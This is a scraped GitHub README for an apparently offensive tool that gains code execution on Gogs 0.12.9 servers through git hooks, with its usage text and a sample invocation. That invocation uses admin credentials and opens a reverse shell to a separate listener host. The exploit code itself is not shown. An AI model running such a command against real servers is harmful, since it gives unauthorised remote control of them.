Gogs Remote Code Execution

Tool to automate code execution on the server running Gogs git service.
Inspired from: https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce

POC

Linux Dependencies

This script automates the execution of git commands using Linux tools: git and expect

sudo apt install git
sudo apt install expect

How to use

./gogs.py -h
usage: gogs.py [-h] -s SERVER -u USERNAME -p PASSWORD -r REVSHELL [-t TLS]

Tool to automate code execution on the server running Gogs git service.
[#] Type: Post-Authenticated
[#] Privilege: Permission to create Git hooks (Admin Panel > Users > Edit Account)
[#] Tested: 0.12.9 

options:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        Hostname/IP (port) (path)
  -u USERNAME, --username USERNAME
                        Username of the account
  -p PASSWORD, --password PASSWORD
                        Password of the account
  -r REVSHELL, --revshell REVSHELL
                        <ip>:<port>
  -t TLS, --tls TLS     true or false

Example

/gogs.py -s 192.168.1.24:8000 -u admin -p 'Password1234' -t false -r 192.168.45.5:80

To-Do

HTTP interaction over internet instead of Reverse Shell
More enumeration modules ...

Name		Name	Last commit message	Last commit date
Latest commit History 20 Commits
Gogs.png		Gogs.png
README.md		README.md
example.svg		example.svg
gogs.py		gogs.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Gogs.png

Gogs.png

README.md

README.md

example.svg

example.svg

gogs.py

gogs.py

Repository files navigation

Gogs Remote Code Execution

POC

Linux Dependencies

How to use

Example

To-Do

About

Releases

Packages

Languages

Ressurect0/Gogs-RCE

Folders and files

Latest commit

History

Repository files navigation

Gogs Remote Code Execution

POC

Linux Dependencies

How to use

Example

To-Do

About

Resources

Stars

Watchers

Forks

Languages